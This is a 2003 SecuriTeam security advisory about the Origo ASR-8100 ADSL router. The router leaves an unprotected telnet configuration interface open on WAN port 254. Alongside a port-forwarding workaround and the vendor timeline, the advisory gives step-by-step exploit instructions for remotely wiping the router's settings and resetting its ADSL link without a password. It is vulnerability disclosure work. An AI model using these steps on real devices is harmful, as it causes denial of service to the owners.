[NEWS] Remote Origo ASR-8100 ADSL Reset and Permanent Denial of Service Attack

From: SecuriTeam (support_at_securiteam.com)
Date: 10/23/03

  • Next message: SecuriTeam: "[NT] eMule's Web Control Panel Vulnerable to DoS (Long Password)" 
    To: list@securiteam.com
Date: 23 Oct 2003 17:46:57 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Remote Origo ASR-8100 ADSL Reset and Permanent Denial of Service Attack
    ------------------------------------------------------------------------

    SUMMARY

    The Origo ASR-8100 ADSL device can be remotely reset to factory settings,
    allowing a permanent denial of service attack until it is reconfigured
    manually by an operator. The attack only takes place after the device is
    reset - which may be some time after it has been performed. PPP
    authentication information is lost on reset to factory settings, so it is
    most likely that the device will be unable to establish a WAN link after
    reset.

    The ADSL link can also be remotely reset, causing temporary DoS and (if
    DHCP is used) its IP address to change.

    Both of these do not require any special privileges (no administrative
    password is required).

    DETAILS

    A telnet-style configuration interface is left open to the WAN interface
    on port 254, without any form of protection on it (password protection).

    Workaround:
    Forwarding external port 254 to an internal port that is unused prevents
    access to the configuration interface.

    This can be done via the web interface by going to:
    http://router-ip/doc/advance.htm
    Click on Configuration: Virtual server
    Enter a new entry:
    Public port: 254
    Private port: 9876
    TCP
    Host IP address: 127.0.0.1
    Click 'Add this setting', then do Configuration: Save Settings/Reboot and
    Click 'Save & Reboot'

    Exploit:
    From any Internet connected host:

    telnet <router global IP address> 254
    Returns a menu:
    01/01/99 CONEXANT SYSTEMS, INC.
    00:04:10
                    ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A)
     
    You are prompted for a LOGIN PASSWORD>
    Just press return
    Brings up MAIN MENU
      1. SYSTEM STATUS AND CONFIGURATION
      2. ADSL MENU
      
      4. REMOTE LOGON

    Origo Reset:
    Press 1 - get to SYSTEM STATUS AND CONFIGURATION
      1. SYSTEM INFORMATION
      2. SYSTEM CONFIGURATION

    Press 2 - get to SYSTEM CONFIGURATION
      1. CHANGE SYSTEM TIME
      2. CHANGE SYSTEM DATE
      3. CHANGE PASSWORD
      4. FACTORY DEFAULT CONFIGURATION

    Type 1 hh:mm:ss to reset the system time
    Type 2 dd/mm/yy to reset the system date
    (Option 3 doesn't work)

    Type 4: Prompt: This will reset all the configurations and the ADSL modem.
    Are you sure?(Y/N)

    Type Y: Message: NVRAM updated

    This does not reset the ADSL modem, only clears the NVRAM. This takes
    effect the next time the modem is reset: the admin password is reset to
    that printed in the documentation, and the ADSL username/password are
    reset, meaning the connection is down permanently until a human sets them
    up again. Any other settings (security etc) are also lost.

    ADSL Link Reset:
    From main menu, type 2 to get to ADSL MENU
      1. ADSL PERFORMANCE STATUS
      2. 24 HOUR ADSL PERFORMANCE HISTORY
      3. 7 DAY ADSL PERFORMANCE HISTORY
      4. ADSL ALARM HISTORY
      5. ADSL TRANSCEIVER CONFIGURATION MENU
      6. ADSL LINK RESET

    Type 6: Prompt: This will bring down the ADSL link. Are you sure(Y/N)?
    Type Y. The ADSL link is reset and a new WAN IP address is requested by
    DHCP (if the ISP uses it).

    Vendor Status:
    UK support for Vendor (support@adsltech.com) was notified on 30th August
    2003 - entirety of reply message was 'Thanks a lot'. Vendor does not
    advertise email addresses so were notified via web form on that date - no
    response received. To date the vendor has not advertised any patches or
    new firmware.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:theo_@_markettos.org.uk>
    Theo Markettos.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] eMule's Web Control Panel Vulnerable to DoS (Long Password)"

    Relevant Pages